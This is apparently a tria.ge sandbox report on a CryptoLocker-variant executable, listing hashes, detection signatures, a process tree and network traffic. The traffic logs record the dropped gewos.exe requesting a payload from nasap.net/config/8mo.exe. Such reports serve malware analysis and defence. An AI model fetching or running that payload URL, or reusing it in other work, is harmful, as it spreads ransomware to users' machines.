Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

2024-04-18...er.exe

windows7-x64

9

2024-04-18...er.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    91s
  • max time network
    113s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/04/2024, 05:45 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-04-18_cb4cd07ca7b3fa8da3e4b62d32d84115_cryptolocker.exe

  • Size

    54KB

  • MD5

    cb4cd07ca7b3fa8da3e4b62d32d84115

  • SHA1

    37bef5bdc59858efae5da1a3ac6ba09c6515ebe4

  • SHA256

    6c7d288794c102582a324388235a1c908528bbdfc9b0bbad6cbf23b7f36ec6f0

  • SHA512

    bea6a0721fbef4f005640efdad37fd3c23cb0d5a0f18c8f7ee23abf4ff89fe2f4c4cb9bdee09af500a891a868a005cb6ec4c45851c2cee1638de9136d36a0c8a

  • SSDEEP

    768:bP9g/WItCSsAfFaeOcfXVr3BPOz5CFBmNuFgUjlo:bP9g/xtCS3Dxx0r

Score
9/10
upx

Malware Config

Signatures

  • Detection of CryptoLocker Variants 2 IoCs
  • UPX dump on OEP (original entry point) 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-04-18_cb4cd07ca7b3fa8da3e4b62d32d84115_cryptolocker.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-04-18_cb4cd07ca7b3fa8da3e4b62d32d84115_cryptolocker.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3696
    • C:\Users\Admin\AppData\Local\Temp\gewos.exe
      "C:\Users\Admin\AppData\Local\Temp\gewos.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      PID:4220

Network

  • flag-us
    DNS
    76.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    76.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    25.24.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    25.24.18.2.in-addr.arpa
    IN PTR
    Response
    25.24.18.2.in-addr.arpa
    IN PTR
    a2-18-24-25deploystaticakamaitechnologiescom
  • flag-us
    DNS
    nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    nasap.net
    IN A
    Response
    nasap.net
    IN A
    35.212.119.5
  • flag-us
    GET
    https://nasap.net/config/8mo.exe
    gewos.exe
    Remote address:
    35.212.119.5:443
    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: nasap.net
    Cache-Control: no-cache
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx
    Date: Thu, 18 Apr 2024 05:45:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Redirect-By: WordPress
    Location: https://www.nasap.net/config/8mo.exe
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: MISS
    X-Proxy-Cache-Info: 0301 NC:000000 UP:
  • flag-us
    DNS
    241.154.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.154.82.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    5.119.212.35.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    5.119.212.35.in-addr.arpa
    IN PTR
    Response
    5.119.212.35.in-addr.arpa
    IN PTR
    511921235bcgoogleusercontentcom
  • flag-us
    DNS
    226.21.18.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    226.21.18.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net
    IN CNAME
    dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net
    IN A
    204.79.197.237
    dual-a-0034.a-msedge.net
    IN A
    13.107.21.237
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid=
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=1A729B9472E86BB51E158FF173CF6AF7; domain=.bing.com; expires=Tue, 13-May-2025 05:45:44 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B3DA462FD7F3435A9106A7FD8B7936A2 Ref B: LON04EDGE0721 Ref C: 2024-04-18T05:45:44Z
    date: Thu, 18 Apr 2024 05:45:43 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid=
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=1A729B9472E86BB51E158FF173CF6AF7
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=2EejdJLj4EyIUpBFoPLPK5tw-0hnK57iKu2JE8-GuME; domain=.bing.com; expires=Tue, 13-May-2025 05:45:44 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B2F279D302554488A4EA464F38A75E09 Ref B: LON04EDGE0721 Ref C: 2024-04-18T05:45:44Z
    date: Thu, 18 Apr 2024 05:45:43 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid=
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=1A729B9472E86BB51E158FF173CF6AF7; MSPTC=2EejdJLj4EyIUpBFoPLPK5tw-0hnK57iKu2JE8-GuME
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B2FAAA32BB5A4DA59573F1F0910934CE Ref B: LON04EDGE0721 Ref C: 2024-04-18T05:45:44Z
    date: Thu, 18 Apr 2024 05:45:43 GMT
  • flag-us
    DNS
    www.nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    www.nasap.net
    IN A
    Response
    www.nasap.net
    IN CNAME
    nasap.net
    nasap.net
    IN A
    35.212.119.5
  • flag-us
    GET
    https://www.nasap.net/config/8mo.exe
    gewos.exe
    Remote address:
    35.212.119.5:443
    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Cache-Control: no-cache
    Host: www.nasap.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 18 Apr 2024 05:45:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <https://www.nasap.net/index.php/wp-json/>; rel="https://api.w.org/"
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: MISS
    X-Proxy-Cache-Info: 0 NC:000000 UP:
  • flag-us
    DNS
    67.32.209.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    67.32.209.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    237.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    237.197.79.204.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    248.81.21.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    248.81.21.2.in-addr.arpa
    IN PTR
    Response
    248.81.21.2.in-addr.arpa
    IN PTR
    a2-21-81-248deploystaticakamaitechnologiescom
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    86.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    86.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    65.139.73.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    65.139.73.23.in-addr.arpa
    IN PTR
    Response
    65.139.73.23.in-addr.arpa
    IN PTR
    a23-73-139-65deploystaticakamaitechnologiescom
  • flag-us
    DNS
    240.221.184.93.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.221.184.93.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 35.212.119.5:443
    https://nasap.net/config/8mo.exe
    tls, http
    gewos.exe
    1.1kB
     5.7kB
     13
    10

    HTTP Request

    GET https://nasap.net/config/8mo.exe

    HTTP Response

    301
  • 204.79.197.237:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid=
    tls, http2
    2.0kB
     9.2kB
     21
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid=

    HTTP Response

    204
  • 35.212.119.5:443
    https://www.nasap.net/config/8mo.exe
    tls, http
    gewos.exe
    3.6kB
     80.8kB
     67
    64

    HTTP Request

    GET https://www.nasap.net/config/8mo.exe

    HTTP Response

    404
  • 8.8.8.8:53
    76.32.126.40.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    76.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    25.24.18.2.in-addr.arpa
    dns
    69 B
     131 B
     1
    1

    DNS Request

    25.24.18.2.in-addr.arpa

  • 8.8.8.8:53
    nasap.net
    dns
    gewos.exe
    55 B
     71 B
     1
    1

    DNS Request

    nasap.net

    DNS Response

    35.212.119.5

  • 8.8.8.8:53
    241.154.82.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    241.154.82.20.in-addr.arpa

  • 8.8.8.8:53
    5.119.212.35.in-addr.arpa
    dns
    71 B
     122 B
     1
    1

    DNS Request

    5.119.212.35.in-addr.arpa

  • 8.8.8.8:53
    226.21.18.104.in-addr.arpa
    dns
    72 B
     134 B
     1
    1

    DNS Request

    226.21.18.104.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
     151 B
     1
    1

    DNS Request

    g.bing.com

    DNS Response

    204.79.197.237
    13.107.21.237

  • 8.8.8.8:53
    www.nasap.net
    dns
    gewos.exe
    59 B
     89 B
     1
    1

    DNS Request

    www.nasap.net

    DNS Response

    35.212.119.5

  • 8.8.8.8:53
    67.32.209.4.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    67.32.209.4.in-addr.arpa

  • 8.8.8.8:53
    237.197.79.204.in-addr.arpa
    dns
    73 B
     143 B
     1
    1

    DNS Request

    237.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    248.81.21.2.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    248.81.21.2.in-addr.arpa

  • 8.8.8.8:53
    55.36.223.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    55.36.223.20.in-addr.arpa

  • 8.8.8.8:53
    86.23.85.13.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    86.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    65.139.73.23.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    65.139.73.23.in-addr.arpa

  • 8.8.8.8:53
    240.221.184.93.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    240.221.184.93.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\gewos.exe
    Filesize

    54KB

    MD5

    02245cd1438188c3953c0b91644d0faa

    SHA1

    bfaad705a0a01156d86d01f0d384d9e122fab294

    SHA256

    8c95d3c342350095151b57af66a5f80a97d6ae81863daa28473be3b52bbef7a6

    SHA512

    510667f5615571327cf6141f10d72aa10d5fe8afa296ee71d08d7e5b6409e8935aaf8e50b6bf364f970ff8c4118e6b609970b5700d7a718b6247b8c5634bc6d5

    Download Submit

  • memory/3696-0-0x0000000000400000-0x000000000040E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/3696-1-0x0000000002250000-0x0000000002256000-memory.dmp

    Filesize

    24KB

    Download

  • memory/3696-2-0x0000000002250000-0x0000000002256000-memory.dmp

    Filesize

    24KB

    Download

  • memory/3696-3-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

    Download

  • memory/4220-22-0x00000000006B0000-0x00000000006B6000-memory.dmp

    Filesize

    24KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.